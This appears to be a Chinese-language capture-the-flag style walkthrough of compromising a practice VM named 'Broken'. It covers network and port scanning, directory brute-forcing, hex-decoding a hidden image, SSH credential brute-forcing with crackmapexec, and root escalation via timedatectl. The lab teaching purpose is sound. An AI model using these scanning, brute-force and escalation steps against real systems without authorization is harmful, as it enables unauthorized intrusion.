因为是从PDF转换过来偶尔可能会出现内容缺少,可以看原版PDF:有道云笔记
实验信息
Broken:192.168.10.111
Kali:192.168.10.106
实验过程
sudo arp-scan --interface eth0 192.168.10.1/24
然后对靶机进行端口探测
nmap -sT -p- --min-rate 1000 192.168.10.111 -oA ./Broken_result
再对端口进行详细扫描和漏洞扫描
cat Broken_result.nmap | grep "open" | awk -F '/' '{print $1}' | paste -sd ','
sudo nmap -sT -sC -sV -p 22,80 192.168.10.111 -oA ./detail
详细扫描发现80端口有几个文件
后台挂着gobuster来跑目录
sudo gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 20 -u http://192.168.10.111/ -x txt,rar,zip,tar,sql,php
打开80端口,发现文件都wget保存到本地,查看网页源码以及文件来收集信息
xdg-open img_forest.jpg
查看REAMD.md的文件类型,是txt类型
用cat发现都是十六进制的字节码
-r选项用于将十六进制格式转换回二进制格式
-p表示输出纯粹的十六进制编码,而不包括其他信息
-s选项用于跳过文件的前N个字节
通过strings来读二进制文件,通过head来读取前几行内容来确定文件类型
-r选项用于将十六进制格式转换回二进制格式
-p表示输出纯粹的十六进制编码,而不包括其他信息
-s选项用于跳过文件的前N个字节
xxd -r -ps README.md > README.bin
strings README.bin | head -n 10
可以看到JFIF头,说明这个文件是图片文件,更改为Jpg后缀并打开
是一段文字信息
再用exiftool来看看其他图片,没有发现有隐藏的信息
同时目录爆破也并没有什么有用信息
所以只能把注意力放到22端口上
我们根据从图片获取的信息制作一个简易的字典文件尝试爆破SSH
通过crackmapexec进行SSH爆破
#--continue-on-success:表示成功获得凭据后继续爆破
#跟john相比,john更偏向快速,creackmapexec支持的协议和功能比较多
sudo crackmapexec ssh 192.168.10.111 -u creds -p creds --continue-on-success
获得账号密码
broken:broken
登陆broken,发现其可以通过timedatectl来提权
通过gtfobins:https://gtfobins.github.io/ 来查看对应的提权方法
成功获得root权限